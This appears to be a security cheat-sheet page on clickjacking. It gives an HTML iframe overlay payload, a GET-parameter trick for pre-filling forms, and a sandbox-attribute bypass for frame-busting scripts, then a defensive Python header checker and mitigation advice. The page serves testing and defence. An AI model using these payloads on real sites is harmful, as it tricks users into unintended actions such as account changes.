Clickjacking

Clickjacking is an interface-based attack in which a user is tricked into clicking actionable content on a hidden website while believing they are clicking content on a decoy website. CSRF tokens do not mitigate clickjacking, because the target session is established with content loaded from the authentic website and every request happens on-domain. Clickjacking is possible whenever a website can be framed.

Payload

Use Burp Clickbandit.

The attacker incorporates the target website as an iframe layer overlaid on the decoy website.

```html
<head>
	<style>
		#target_website {
			position:relative;
			width:128px;
			height:128px;
			opacity:0.00001;
			z-index:2;
			}
		#decoy_website {
			position:absolute;
			top:300px;
			left:400px;
			z-index:1;
			}
	</style>
</head>
<body>
	<div id="decoy_website">
	Click me (...decoy web content here...)
	</div>
	<iframe id="target_website" src="https://vulnerable-website.com">
	</iframe>
</body>
```

Note that form fields can also be pre-populated when the target page accepts their values from GET parameters, so the framed page loads with the attacker's values already filled in and only the submit click is needed:

https://target_website/change_email?email=test@test.com

Frame Busting Bypass

A common client-side protection enforced by the web browser is a frame busting (frame breaking) script. Such protection can also be provided by browser JavaScript add-ons or extensions such as NoScript.

An effective workaround against frame busters is the HTML5 iframe `sandbox` attribute. When it is set with the `allow-forms` or `allow-scripts` value and the `allow-top-navigation` value is omitted, the frame buster script is neutralized: the sandboxed iframe is denied top-level navigation, so the script cannot redirect the top window and break out of the frame.

```html
<iframe id="victim_website" src="https://victim-website.com" sandbox="allow-forms"></iframe>
```
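Because a script-based frame buster can be neutralized by the sandbox attribute, the reliable mitigation is server-side: the `X-Frame-Options` header or, preferably, a CSP `frame-ancestors` directive. The following Python helper is an added example (not from the original page or from Burp Clickbandit) that classifies a response's headers by whether browsers will let the page be framed; the sample responses and host names are constructed.

```python
from typing import Dict, List, Optional, Tuple

# Constructed sample responses (not captured from any real site) to audit below.
SAMPLE_RESPONSES: Dict[str, Dict[str, str]] = {
    "legacy-deny": {"X-Frame-Options": "DENY"},
    "csp-none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp-partner": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
    "csp-overrides-xfo": {"X-Frame-Options": "SAMEORIGIN",
                          "Content-Security-Policy": "frame-ancestors *"},
    "obsolete-allow-from": {"X-Frame-Options": "ALLOW-FROM https://a.example"},
    "no-protection": {"Content-Type": "text/html"},
}

def _frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the source list of the CSP frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.strip("'").lower() for t in tokens[1:]]
    return None

def framing_policy(headers: Dict[str, str]) -> Tuple[str, str]:
    """Classify one response as 'blocked', 'same-origin', 'restricted' or 'frameable'."""
    h = {k.lower(): v for k, v in headers.items()}
    # Browsers that understand frame-ancestors ignore X-Frame-Options when both are
    # present, so the CSP directive is evaluated first.
    sources = _frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:
        if not sources or sources == ["none"]:
            return "blocked", "CSP frame-ancestors 'none'"
        if "*" in sources or any(s in ("http:", "https:") for s in sources):
            return "frameable", "CSP frame-ancestors permits any origin"
        if sources == ["self"]:
            return "same-origin", "CSP frame-ancestors 'self'"
        return "restricted", "CSP frame-ancestors " + " ".join(sources)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "blocked", "X-Frame-Options: DENY"
    if xfo == "SAMEORIGIN":
        return "same-origin", "X-Frame-Options: SAMEORIGIN"
    if xfo:
        # ALLOW-FROM and any other non-standard value are ignored by current browsers.
        return "frameable", f"X-Frame-Options value {xfo!r} is ignored by browsers"
    return "frameable", "no X-Frame-Options or CSP frame-ancestors header"

if __name__ == "__main__":
    for name, headers in SAMPLE_RESPONSES.items():
        print(f"{name:22s} {framing_policy(headers)}")
```

Any response classified as `frameable` is a clickjacking candidate and should get `Content-Security-Policy: frame-ancestors 'none'` (or `'self'`), with `X-Frame-Options` kept only as a fallback for older browsers.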
